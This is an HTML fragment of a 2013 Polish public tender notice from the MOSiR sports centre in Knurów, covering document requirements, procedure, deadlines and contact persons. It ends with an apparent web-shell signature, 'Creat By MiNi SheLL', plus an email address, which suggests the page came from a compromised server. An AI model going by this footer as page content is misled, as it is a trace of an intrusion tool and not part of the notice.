<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawionym w terminie określonym odpowiednio dla danego dokumentu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę istotnych postanowień umowy zawartej w wyniku niniejszego postępowania w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy w przypadkach wskazanych w projekcie umowy stanowiącym załącznik do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mosirknurow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek wykonawcy w MOSIR Knurów, ul. Górnicza 2, sekretariat - pok. 206, w godz. pracy MOSIR lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2013 godzina 10:00, miejsce: Miejski Ośrodek Sportu i Rekreacji, 44-193 Knurów, ul. Górnicza 2, sekretariat - pok. nr 206.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami uprawnionymi do porozumiewania się z wykonawcami są: 
Kierownik Obiektów MOSIR Knurów - Waldemar Kośmider, tel. 32 332-63-60,
Kierownik Obiektów MOSIR Knurów - Marcin Kasprzyk, tel. 32 338-19-23.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com